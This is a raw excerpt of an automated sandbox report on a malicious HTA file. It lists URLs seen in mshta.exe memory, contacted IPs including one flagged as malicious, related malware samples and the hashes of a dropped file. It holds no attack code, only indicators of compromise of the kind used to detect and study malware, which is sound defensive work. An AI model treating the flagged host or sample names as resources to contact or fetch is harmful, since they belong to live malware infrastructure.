00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.americanas.com.br/produto/5008766730?chave=dk_hm_bn_4_2_oferta-esportemshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngJmshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.pngxmshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entregameta.mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://images-americanas.b2w.io/produtos/7211551574/imagens/sunga-masculina-adidas-3-listras/721155mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535775149.000000000530C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalinahttps://www.americamshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofamshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535630387.0000000005308000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensamshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupommshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-mob-19fde28501d5.pngmshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.americanas.com.br/hotsite/banner-games?chave=dk_hm_bn_5_6_consolesmeta.largemeta.large.hmshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.americanas.com.br/busca/guarda-roupa-bergamomshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://images-americanas.b2w.io/produtos/7503637854/imagens/conjunto-com-40-bolas-de-4cm-vermelha-emshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.534806210.00000000052DA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005301000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535597591.0000000005303000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              142.250.181.130
                                                                                                                                                                                                                              securepubads.g.doubleclick.netUnited States
                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                              3.5.234.55
                                                                                                                                                                                                                              s3-r-w.sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                              16.12.2.60
                                                                                                                                                                                                                              s3-sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                              92.205.57.102
                                                                                                                                                                                                                              102.57.205.92.host.secureserver.netGermany
                                                                                                                                                                                                                              8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1579831
                                                                                                                                                                                                                              Start date and time:2024-12-23 10:26:04 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 5m 32s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                                                              Number of analysed new started processes analysed:14
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal88.rans.evad.winHTA@16/61@16/4
                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              • Number of executed functions: 74
                                                                                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .hta
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 172.217.19.232, 2.16.158.43, 2.16.158.176
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): e96427.dscb.akamaiedge.net, www.googletagmanager.com, sni-wildsan.b2wdigital.com.edgekey.net
                                                                                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 3520 because there are no executed function
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • VT rate limit hit for: Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              04:26:50API Interceptor428x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                                              04:28:04API Interceptor2x Sleep call for process: cmd.exe modified
                                                                                                                                                                                                                              04:28:04API Interceptor123x Sleep call for process: wscript.exe modified
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              92.205.57.102Factura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                s3-r-w.sa-east-1.amazonaws.comdecrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 52.95.163.36
                                                                                                                                                                                                                                decrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 16.12.1.62
                                                                                                                                                                                                                                appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 3.5.234.32
                                                                                                                                                                                                                                appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 3.5.233.174
                                                                                                                                                                                                                                00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 3.5.232.137
                                                                                                                                                                                                                                00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 16.12.1.14
                                                                                                                                                                                                                                0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 3.5.232.21
                                                                                                                                                                                                                                0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 3.5.234.1
                                                                                                                                                                                                                                0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 3.5.232.185
                                                                                                                                                                                                                                WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 52.95.163.114
                                                                                                                                                                                                                                static.nl3.vip.prod.criteo.nethttp://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                https://www.aarp.org/money/scams-fraud/info-2024/title-theft-real-estate-fraud.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                http://deepai.orgGet hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18Get hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                https://t.co/WUjzOGRMNxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                http://currently0734.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 178.250.1.3
                                                                                                                                                                                                                                102.57.205.92.host.secureserver.netFactura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                GD-EMEA-DC-SXB1DEhmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                • 188.138.99.78
                                                                                                                                                                                                                                https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 92.205.22.61
                                                                                                                                                                                                                                236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 91.250.85.177
                                                                                                                                                                                                                                bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                • 85.25.248.167
                                                                                                                                                                                                                                bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                • 85.25.248.111
                                                                                                                                                                                                                                bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                • 62.138.132.153
                                                                                                                                                                                                                                armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                • 62.75.161.26
                                                                                                                                                                                                                                IGz.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                • 62.138.26.111
                                                                                                                                                                                                                                jade.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                • 85.25.248.132
                                                                                                                                                                                                                                zZ8OdFfZnb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 85.25.152.9
                                                                                                                                                                                                                                AMAZON-02USFBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 185.166.143.50
                                                                                                                                                                                                                                armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 108.159.159.70
                                                                                                                                                                                                                                BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 185.166.143.48
                                                                                                                                                                                                                                jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 52.216.152.124
                                                                                                                                                                                                                                mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 185.166.143.49
                                                                                                                                                                                                                                LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 185.166.143.49
                                                                                                                                                                                                                                zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 52.217.67.100
                                                                                                                                                                                                                                Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 52.217.18.140
                                                                                                                                                                                                                                armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 54.203.164.5
                                                                                                                                                                                                                                5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 52.217.203.57
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                7dcce5b76c8b17472d024758970a406bPago.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                PyrNUtAUkw.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 142.250.181.130
                                                                                                                                                                                                                                • 3.5.234.55
                                                                                                                                                                                                                                • 16.12.2.60
                                                                                                                                                                                                                                • 92.205.57.102
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 324, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):219607
                                                                                                                                                                                                                                Entropy (8bit):7.995126654677858
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:3072:JQZzvI4lMRvJSGyQATDA0imIA1YY20evyJAnhtmMxpd9uyT87cyqR8PkocEhjcq:J6yvGQ0i+FAneM19HtRVEhjj
                                                                                                                                                                                                                                MD5:BF072C6777FA104E9B1F7A54E7516B41
                                                                                                                                                                                                                                SHA1:1AF2A3DF1A1E5CDF79264714BB6A99A7E46C8440
                                                                                                                                                                                                                                SHA-256:7B52EAED3F13E8B73FC13F425A6F9D25B3C98650D88ED6D44B6A6F60438B7934
